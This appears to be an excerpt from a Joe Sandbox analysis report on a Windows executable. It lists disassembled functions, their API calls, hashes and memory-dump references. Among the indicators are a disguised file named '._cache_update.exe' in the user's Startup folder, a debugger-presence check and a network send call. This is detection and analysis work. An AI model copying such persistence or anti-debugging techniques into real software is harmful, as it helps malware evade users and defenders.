                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Timeout_strlen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2777139624-0
                                                                                                                                                          • Opcode ID: d1edb95e1e9347231973ea4d409034b7ea05d780231b2aa09f65aba1c311051c
                                                                                                                                                          • Instruction ID: 41b58ba63d10873bd5f5cdabbccb04b6900028518963e6635f5bcac6ad78d78f
                                                                                                                                                          • Opcode Fuzzy Hash: d1edb95e1e9347231973ea4d409034b7ea05d780231b2aa09f65aba1c311051c
                                                                                                                                                          • Instruction Fuzzy Hash: 1111EB31600114A7CB08BF69ECC6DBF7BE8AF55740B000479FA06DF192DF70994987A0
                                                                                                                                                          Function 00123682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • 74E4C8D0.UXTHEME ref: 001236E6
                                                                                                                                                            • Part of subcall function 00142025: __lock.LIBCMT ref: 0014202B
                                                                                                                                                            • Part of subcall function 001232DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001232F6
                                                                                                                                                            • Part of subcall function 001232DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0012330B
                                                                                                                                                            • Part of subcall function 0012374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0012376D
                                                                                                                                                            • Part of subcall function 0012374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0012377F
                                                                                                                                                            • Part of subcall function 0012374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,00000104,?,001E1120,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe,001E1124,?,?), ref: 001237EE
                                                                                                                                                            • Part of subcall function 0012374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00123860
                                                                                                                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00123726
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3809921791-0
                                                                                                                                                          • Opcode ID: d01a2ee35c656d945b72969e6c1e8d5fcdce4dba4708a274ea0c2e8ed710fb68
                                                                                                                                                          • Instruction ID: f3df8808f0552cff8cabccfc45456411bc0bfbf9e04b3a31db04d160dc19bc0d
                                                                                                                                                          • Opcode Fuzzy Hash: d01a2ee35c656d945b72969e6c1e8d5fcdce4dba4708a274ea0c2e8ed710fb68
                                                                                                                                                          • Instruction Fuzzy Hash: 6B11C0718083809BC310EF69EC8591EBBF8FB94710F00451EF4558B6B1DB709A84CF92
                                                                                                                                                          Function 00124B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00124C2B,?,?,?,?,0012BE63), ref: 00124BB6
                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00124C2B,?,?,?,?,0012BE63), ref: 00194972
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: 3a82cce252c8af261e32a8c56acac8667ee6a20d4a62a41274b89917d08a1001
                                                                                                                                                          • Instruction ID: e1a60c61e461012616a867f5b18907473917aec94ff07b05a9ef23ae8e54f99b
                                                                                                                                                          • Opcode Fuzzy Hash: 3a82cce252c8af261e32a8c56acac8667ee6a20d4a62a41274b89917d08a1001
                                                                                                                                                          • Instruction Fuzzy Hash: BA018C70248318BFF7344E24EC8AF667ADCAB05B68F108319FAE56A1E0C7B45C958B54
                                                                                                                                                          Function 0013F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0016AEA5,?,?,00000000,00000008), ref: 0013F282
                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0016AEA5,?,?,00000000,00000008), ref: 0013F2A6
                                                                                                                                                            • Part of subcall function 0013F2D0: _memmove.LIBCMT ref: 0013F307
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3033907384-0
                                                                                                                                                          • Opcode ID: 18cb323ea92b936f787f198355c5e2a3ca51cedb1bd55a49ef5bef2000b56ae8
                                                                                                                                                          • Instruction ID: 59c14f0c6e970c3e50fc72aa298abbdc1fab96c0498cf7fc51d3d26c144e5b40
                                                                                                                                                          • Opcode Fuzzy Hash: 18cb323ea92b936f787f198355c5e2a3ca51cedb1bd55a49ef5bef2000b56ae8
                                                                                                                                                          • Instruction Fuzzy Hash: 77F04FB6504514BFAB11ABA6EC84DBB7FADEF9A360700802AFD09CA121CB31DC41C670
                                                                                                                                                          Function 0014F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___lock_fhandle.LIBCMT ref: 0014F7D9
                                                                                                                                                          • __close_nolock.LIBCMT ref: 0014F7F2
                                                                                                                                                            • Part of subcall function 0014886A: __getptd_noexit.LIBCMT ref: 0014886A
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1046115767-0
                                                                                                                                                          • Opcode ID: 982b849f3ad85c97a0c96881b85ebe7cda798008facd39be317421f0ba62acd2
                                                                                                                                                          • Instruction ID: 17700da48b84f826e6f68d511d6fae816f6b66d0de934dab52483a4eedbe03e2
                                                                                                                                                          • Opcode Fuzzy Hash: 982b849f3ad85c97a0c96881b85ebe7cda798008facd39be317421f0ba62acd2
                                                                                                                                                          • Instruction Fuzzy Hash: 8311E172C056528ED7117FA4D88235D7AA06F62335F670368E4246F3F3CBB49D8287A1
                                                                                                                                                          Function 001234F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0012352A
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • _wcscat.LIBCMT ref: 001966C0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 257928180-0
                                                                                                                                                          • Opcode ID: dd3617b64b5b46f97a2899b25bef1d6f4991962ff54bfbf05fcd9c51699a372d
                                                                                                                                                          • Instruction ID: 7f8582f890b2e5e22a1f059e6ff1da3585205895315b30be79dea0cffcf99b64
                                                                                                                                                          • Opcode Fuzzy Hash: dd3617b64b5b46f97a2899b25bef1d6f4991962ff54bfbf05fcd9c51699a372d
                                                                                                                                                          • Instruction Fuzzy Hash: 7F018071A4412CAACF04FBA0F9469DE77F9AF24348F0141A5B929D7190EB309B958BA1
                                                                                                                                                          Function 00179500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • send.WS2_32(00000000,?,00000000,00000000), ref: 00179534
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00179557
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastsend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1802528911-0
                                                                                                                                                          • Opcode ID: 1619308993fcdac9d363ffc5f2ecf207bbd23f16472f9c172523852a21321329
                                                                                                                                                          • Instruction ID: 992b727ac95db2c65342a30f64fa239d4940290aeab9adab32b580225391ef2c
                                                                                                                                                          • Opcode Fuzzy Hash: 1619308993fcdac9d363ffc5f2ecf207bbd23f16472f9c172523852a21321329
                                                                                                                                                          • Instruction Fuzzy Hash: 3D017C352002009FC714EB68EC91B6AB7E9EBA9724F11812AE64AC7791CB71EC45CB90
                                                                                                                                                          Function 00144274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0014889E: __getptd_noexit.LIBCMT ref: 0014889E
                                                                                                                                                          • __lock_file.LIBCMT ref: 001442B9
                                                                                                                                                            • Part of subcall function 00145A9F: __lock.LIBCMT ref: 00145AC2
                                                                                                                                                          • __fclose_nolock.LIBCMT ref: 001442C4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2800547568-0
                                                                                                                                                          • Opcode ID: b5fbc1507a12ccf4820a9ff919d712214361a6b0f17ff71177e703afe735d851
                                                                                                                                                          • Instruction ID: 71a9b3d71e29fab41eee48d643f46c60deca962a1c04451ca45bc7e458d886be
                                                                                                                                                          • Opcode Fuzzy Hash: b5fbc1507a12ccf4820a9ff919d712214361a6b0f17ff71177e703afe735d851
                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0BE71801B059BD720BF759802BAE7BE06F60335F668609F824AB1E2CBBC89019B51
                                                                                                                                                          Function 0013F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • timeGetTime.WINMM ref: 0013F57A
                                                                                                                                                            • Part of subcall function 0012E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012E279
                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 001975D3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePeekSleepTimetime
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1792118007-0
                                                                                                                                                          • Opcode ID: bbe6daf483a451339f1ef9e00db1186d409a69bf76e0513c7aa873b5b1bdd829
                                                                                                                                                          • Instruction ID: 74c970b9ed469e93b4749bb90ce72a3fe853b5cf56521adb70b0befd7e78d796
                                                                                                                                                          • Opcode Fuzzy Hash: bbe6daf483a451339f1ef9e00db1186d409a69bf76e0513c7aa873b5b1bdd829
                                                                                                                                                          • Instruction Fuzzy Hash: 00F08C712007289FD354EFA9E405B9ABBE8AF69320F01002AF81AC7651EB70B850CBD0
                                                                                                                                                          Function 00134040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                                          • Instruction ID: 4bc82de525ead7a545775cac192f23bcc919aa8ef353ce464127be00a9f92083
                                                                                                                                                          • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                                                          • Instruction Fuzzy Hash: 3361BFB5A006069FDB14DF64C880ABAF7F4FF18310F108269E91A87691E770FD95CB91
                                                                                                                                                          Function 0013EF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ae39c585d72072590cf72a12dc84f3eb5d64be112c82f043aacf3edefd8dc81d
                                                                                                                                                          • Instruction ID: d61314959b6ca68802359d03545ecd2ec4f1cd0b6a9bfd29193689e681b2f251
                                                                                                                                                          • Opcode Fuzzy Hash: ae39c585d72072590cf72a12dc84f3eb5d64be112c82f043aacf3edefd8dc81d
                                                                                                                                                          • Instruction Fuzzy Hash: BA51B335700214AFCF08EFA8D991EAE77EAAF59314F144069F9069B392DB30ED15DB90
                                                                                                                                                          Function 0012B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
